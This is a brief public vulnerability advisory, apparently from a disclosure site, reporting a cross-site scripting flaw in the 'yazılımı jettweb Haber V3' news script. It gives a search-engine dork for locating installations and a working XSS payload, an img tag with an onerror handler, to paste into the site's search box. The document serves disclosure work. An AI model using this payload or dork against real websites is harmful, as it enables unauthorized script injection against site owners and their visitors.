Yazilimi Jettweb version 3 suffers from a cross site scripting vulnerability.
615c60e1db3f217ab8661c45929e41efa7df70a1ef79fa7234f592cf846d97a4
====================================================================================================================================
| # Title : yazılımı jettweb Haber V3 XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) |
| # Vendor : http://haberv3.proemlaksitesi.net/ |
| # Dork : "yazılımı jettweb" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] In the search box, we use the payload : <--`<img/src=` onerror=confirm`https://cxsecurity.com/author/indoushka/1/`> --!>
[+] test : https://127.0.0.1/haberv3proemlaksitesinet/
==Greetings to :=========================================================================================================================
| |
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* thelastvvv *Zigoo.eg * moncet |
| |
=========================================================================================================================================